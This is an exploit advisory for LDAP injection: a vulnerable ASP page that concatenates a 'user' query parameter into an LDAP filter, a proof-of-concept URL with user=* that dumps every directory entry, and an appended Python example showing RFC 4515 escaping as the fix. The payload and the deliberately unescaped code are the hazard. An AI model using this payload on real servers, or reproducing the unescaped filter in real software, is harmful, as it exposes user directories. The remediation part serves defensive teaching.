LDAP injection proof of concept exploit.

[+] Vulnerability : LDAP Injection
[+] Category : Implemented Web exploit
[+] Category : Attack Technique
[+] Author  : mc2_s3lector
[+] dork    : X/o/"
[+] Contact : www.yogyacarderlink.web.id
[+] date : 4-2-10
[+] Big thanks to : Allah SWT, jasakom, KeDai Computerworks, 0n3-d4y n3ro, eplaciano, all*.indonesian like a coding,
----------------------------------------------------------------------
Directory access protocol / directory manipulation, protocol breaker -> standard protocol, query custom statement, page request, component execute command, database server, web apps services modify, remove etc.
----------------------------------------------------------------------
code:

<%@ Language=VBScript %>
<html>
<head></head>
<body>
<%
Dim userName
Dim filter
Dim ldapObj

Const LDAP_SERVER = "ldap.example"

userName = Request.QueryString("user")   ' <----- (*1) look at this bug line: parameter user is only checked for empty

if ( userName = "" ) then
    Response.Write("<b>Invalid request. Please specify a valid user name</b><br>")
    Response.End()
end if

' (*1) userName is used to initialize the filter variable on this line;
' the filter goes directly into the LDAP query call at (*3)
filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry

'Creating the LDAP object and setting the base dn
Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
ldapObj.ServerName = LDAP_SERVER
ldapObj.DN = "ou=people,dc=spilab,dc=com"

'Setting the search filter
ldapObj.SearchFilter = filter   ' <--- (*3) SearchFilter is set from filter on this line
ldapObj.Search

'Showing the user enumeration info
While ldapObj.result = 1   ' (*4)
    Response.Write("<p>")
    Response.Write("<b><u>User information for : " + ldapObj.AttrValue(0) + "</u></b><br>")
    For i = 0 To ldapObj.AttrCount - 1
        Response.Write("<b>" + ldapObj.AttrType(i) + "</b> : " + ldapObj.AttrValue(i) + "<br>")
    Next
    Response.Write("</p>")
Wend   ' (*5)
%>
</body>
</html>
----------------------------------------------------------------------
Control over the LDAP query sent to the LDAP server, and the query result is returned by the loop at (*4 to *5).

POC:
http://server/ldapsearch.asp?user=*   <---- sends the * character in the parameter user, so the filter variable in the code is initialized with (uid=*). The resulting LDAP statement will make the server return
----------------------------------------------------------------------
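The fix for the filter line in the ASP page above is to escape the user value before concatenating it, so that * can only be a literal character. The following is an added example, not part of the original advisory and written in Python rather than ASP so it runs without an LDAP server; the sample directory, the function names and the small single-filter matcher are constructed for illustration.

```python
import re

# Constructed sample directory entries (not from the original page).
DIRECTORY = [
    {"uid": "alice", "cn": "Alice Example"},
    {"uid": "bob", "cn": "Bob Example"},
    {"uid": "*", "cn": "Entry whose uid is a literal asterisk"},
]

# RFC 4515: these characters must be written as \XX inside a filter value.
_SPECIAL = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape user input so it can only ever be a literal assertion value."""
    return "".join(_SPECIAL.get(ch, ch) for ch in value)


def build_filter_vulnerable(user: str) -> str:
    # Same string concatenation as the ASP page: "(uid=" + userName + ")"
    return "(uid=" + user + ")"


def build_filter_hardened(user: str) -> str:
    return "(uid=" + escape_filter_value(user) + ")"


def _unescape(part: str) -> str:
    # Turn a backslash-hex pair back into the character it stands for.
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), part)


def search(ldap_filter: str) -> list:
    """Model of a directory evaluating one (attr=value) filter:
    a raw * is a wildcard, a backslash-hex pair is a literal character."""
    m = re.fullmatch(r"\(([A-Za-z]+)=(.*)\)", ldap_filter, re.S)
    if not m:
        raise ValueError("only simple (attr=value) filters are modelled here")
    attr, value = m.groups()
    # Escaped asterisks appear as \2a, so every raw '*' left here is a wildcard.
    pattern = ".*".join(re.escape(_unescape(p)) for p in value.split("*"))
    # Case-insensitive comparison, as uid matching normally is.
    return [e[attr] for e in DIRECTORY
            if attr in e and re.fullmatch(pattern, e[attr], re.S | re.I)]
```

With the concatenated filter, user=* returns every entry; with the escaped filter the same input matches only an entry whose uid is literally *.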